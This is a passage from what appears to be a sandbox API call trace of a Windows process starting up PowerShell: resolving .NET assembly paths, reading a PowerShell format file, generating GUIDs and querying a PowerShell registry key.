[0079.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
[0079.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
[0079.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
[0079.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
[0079.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0079.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0079.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
[0079.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
[0079.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
[0079.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
[0079.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0079.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
[0079.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.663] VirtualQuery (in: lpAddress=0xcb8a0, lpBuffer=0xcc760, dwLength=0x30 | out: lpBuffer=0xcc760*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.663] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xf99ef715, Data2=0x6b33, Data3=0x4598, Data4=([0]=0x93, [1]=0x47, [2]=0x79, [3]=0x27, [4]=0x6, [5]=0x7d, [6]=0x22, [7]=0x3e))) returned 0x0
[0079.664] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xce773b12, Data2=0x5513, Data3=0x4921, Data4=([0]=0xbd, [1]=0xd5, [2]=0x54, [3]=0x63, [4]=0x1d, [5]=0x74, [6]=0x35, [7]=0x5f))) returned 0x0
[0079.664] VirtualQuery (in: lpAddress=0xcba50, lpBuffer=0xcc910, dwLength=0x30 | out: lpBuffer=0xcc910*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.665] VirtualQuery (in: lpAddress=0xcba50, lpBuffer=0xcc910, dwLength=0x30 | out: lpBuffer=0xcc910*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.666] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x67333bf4, Data2=0x1e11, Data3=0x476a, Data4=([0]=0x83, [1]=0x8f, [2]=0x1a, [3]=0x5b, [4]=0x10, [5]=0x78, [6]=0x12, [7]=0xae))) returned 0x0
[0079.667] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x38ede8b4, Data2=0x2fc9, Data3=0x4e29, Data4=([0]=0xb3, [1]=0x9e, [2]=0xa9, [3]=0x13, [4]=0x9f, [5]=0xa2, [6]=0xf4, [7]=0x5b))) returned 0x0
[0079.667] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.668] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.668] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.668] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xb777ef20, Data2=0x50fb, Data3=0x4e30, Data4=([0]=0xb2, [1]=0x2a, [2]=0x6e, [3]=0x9, [4]=0xb1, [5]=0x24, [6]=0xf0, [7]=0x64))) returned 0x0
[0079.668] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.668] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.669] VirtualQuery (in: lpAddress=0xcb310, lpBuffer=0xcc1d0, dwLength=0x30 | out: lpBuffer=0xcc1d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.669] VirtualQuery (in: lpAddress=0xcb310, lpBuffer=0xcc1d0, dwLength=0x30 | out: lpBuffer=0xcc1d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.669] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x4f74711a, Data2=0x11ba, Data3=0x4228, Data4=([0]=0xbf, [1]=0x5e, [2]=0xb0, [3]=0xe3, [4]=0x5, [5]=0x5e, [6]=0xca, [7]=0xff))) returned 0x0
[0079.669] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x3774e925, Data2=0x403, Data3=0x491b, Data4=([0]=0x84, [1]=0xc9, [2]=0x53, [3]=0x69, [4]=0x71, [5]=0xae, [6]=0x1c, [7]=0x34))) returned 0x0
[0079.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.669] SetErrorMode (uMode=0x1) returned 0x1
[0079.670] SetErrorMode (uMode=0x1) returned 0x1
[0079.670] GetFileType (hFile=0x304) returned 0x1
[0079.670] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.670] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.670] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.670] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.671] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.671] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.671] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.671] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.672] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.672] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.672] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.672] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.672] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.673] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.673] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.673] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.674] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.674] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0xbce, lpOverlapped=0x0) returned 1
[0079.674] ReadFile (in: hFile=0x304, lpBuffer=0x33e4b36, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e4b36*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.674] ReadFile (in: hFile=0x304, lpBuffer=0x33e5400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x33e5400*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.674] SetErrorMode (uMode=0x1) returned 0x1
[0079.674] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd20 | out: lpFileInformation=0xccd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
[0079.675] SetErrorMode (uMode=0x1) returned 0x1
[0079.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.675] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce08 | out: phkResult=0xcce08*=0x304) returned 0x0
[0079.675] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd8c, lpData=0x0, lpcbData=0xccd88*=0x0 | out: lpType=0xccd8c*=0x1, lpData=0x0, lpcbData=0xccd88*=0x56) returned 0x0
[0079.675] CoTaskMemAlloc (cb=0x5a) returned 0x301e40
[0079.675] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd5c, lpData=0x301e40, lpcbData=0xccd58*=0x56 | out: lpType=0xccd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd58*=0x56) returned 0x0
[0079.675] CoTaskMemFree (pv=0x301e40)
[0079.675] RegCloseKey (hKey=0x304) returned 0x0
[0079.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.678] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x4c9886cc, Data2=0x332e, Data3=0x4231, Data4=([0]=0xa0, [1]=0x92, [2]=0x9c, [3]=0xc3, [4]=0x8b, [5]=0x65, [6]=0x75, [7]=0x1c))) returned 0x0
[0079.678] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xfe4b300, Data2=0x8b57, Data3=0x4638, Data4=([0]=0xb4, [1]=0x8b, [2]=0x55, [3]=0xa0, [4]=0x81, [5]=0xf1, [6]=0x98, [7]=0x22))) returned 0x0
[0079.678] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x64553d0a, Data2=0xe96c, Data3=0x4ff9, Data4=([0]=0x96, [1]=0xf9, [2]=0x37, [3]=0xb6, [4]=0xfc, [5]=0x9a, [6]=0x6b, [7]=0x60))) returned 0x0
[0079.679] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x77ac547f, Data2=0x8b76, Data3=0x4ca1, Data4=([0]=0xbe, [1]=0x4e, [2]=0x99, [3]=0x6f, [4]=0xb2, [5]=0xa8, [6]=0x66, [7]=0x9e))) returned 0x0
[0079.679] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x7228c1a0, Data2=0xfff9, Data3=0x4305, Data4=([0]=0x8e, [1]=0xd8, [2]=0xbf, [3]=0x92, [4]=0x74, [5]=0x9f, [6]=0xe5, [7]=0x45))) returned 0x0
[0079.679] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xdf27eae3, Data2=0x6dd8, Data3=0x4479, Data4=([0]=0x97, [1]=0xc9, [2]=0xc, [3]=0x4, [4]=0xb5, [5]=0xe4, [6]=0x18, [7]=0xf2))) returned 0x0
[0079.679] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.679] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x6092252e, Data2=0x7b13, Data3=0x4f29, Data4=([0]=0xb7, [1]=0x8b, [2]=0xf8, [3]=0xf1, [4]=0xb7, [5]=0x79, [6]=0xf5, [7]=0x7f))) returned 0x0
[0079.679] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.679] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.680] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xe8c02f76, Data2=0xc16d, Data3=0x4c22, Data4=([0]=0x94, [1]=0x79, [2]=0x91, [3]=0x3e, [4]=0xad, [5]=0xfe, [6]=0x67, [7]=0xc7))) returned 0x0
[0079.680] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x5f4c2afd, Data2=0xbceb, Data3=0x4cbb, Data4=([0]=0xbb, [1]=0xd, [2]=0x5b, [3]=0xa9, [4]=0xe2, [5]=0x52, [6]=0x24, [7]=0x94))) returned 0x0
[0079.680] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x9928be4f, Data2=0xa2c3, Data3=0x4fc9, Data4=([0]=0x82, [1]=0x5e, [2]=0x65, [3]=0xcf, [4]=0x83, [5]=0xae, [6]=0x19, [7]=0x27))) returned 0x0
[0079.680] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xbc9177cf, Data2=0x7f74, Data3=0x491e, Data4=([0]=0x84, [1]=0xb9, [2]=0x6d, [3]=0x9a, [4]=0xbb, [5]=0x5a, [6]=0x48, [7]=0x6d))) returned 0x0
[0079.680] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.680] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xa18972a6, Data2=0xf6b0, Data3=0x463d, Data4=([0]=0x9f, [1]=0x6f, [2]=0xda, [3]=0xa3, [4]=0x5b, [5]=0xa2, [6]=0xd2, [7]=0xbf))) returned 0x0
[0079.680] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.681] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.681] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.681] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.681] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.681] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x757da18b, Data2=0xe1a, Data3=0x43d7, Data4=([0]=0xb2, [1]=0xf4, [2]=0x4, [3]=0xcc, [4]=0xcb, [5]=0x4c, [6]=0xb9, [7]=0xc9))) returned 0x0
